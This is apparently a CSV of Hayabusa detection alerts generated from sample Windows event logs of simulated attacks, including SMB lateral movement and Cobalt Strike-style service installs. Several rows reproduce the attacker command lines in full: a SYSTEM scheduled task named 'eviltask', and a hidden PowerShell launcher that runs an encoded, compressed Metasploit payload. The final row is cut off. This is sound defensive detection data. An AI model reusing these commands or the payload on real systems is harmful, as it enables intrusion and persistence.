2021-04-21 18:42:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1050 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:43:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xf90 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 22:30:00.569 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\schtasks.exe"" /create /sc minute /mo 1 /tn eviltask /tr C:\tools\shell.cmd /ru SYSTEM | Path: C:\Windows\System32\schtasks.exe | PID: 0x15b4 | User: admmig | LID: 0x6fc89e",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-4698 Persistent scheduled task with SYSTEM privileges creation.evtx
2021-04-21 22:30:03.012 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x2ac | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-4698 Persistent scheduled task with SYSTEM privileges creation.evtx
2021-04-21 23:56:41.780 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x1659379,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-21 23:56:41.786 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x1659379,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\WindowsPowerShell\v1.0\powershell.exe | IP Addr: 10.23.123.11 | LID: 0x1659379,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID5145-remote service creation over SMB.evtx
2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\WindowsPowerShell\v1.0\powershell.exe | IP Addr: 10.23.123.11 | LID: 0x1659379,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\WindowsPowerShell\v1.0\powershell.exe | IP Addr: 10.23.123.11 | LID: 0x1659379,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5145-remote shell execution via SMB admin share.evtx
2021-04-21 23:56:41.897 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x1659379,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,Exec,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,Exec | PrivEsc | LatMov,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,Exec,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,Exec | PrivEsc | LatMov,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,Exec,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx
2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,Exec | PrivEsc | LatMov,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx
2021-04-21 23:56:43.246 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1510 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-21 23:56:43.246 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1510 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-21 23:56:43.280 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1140 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-21 23:56:43.280 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1140 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-21 23:56:46.597 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | PID: 0x13b8 | User: 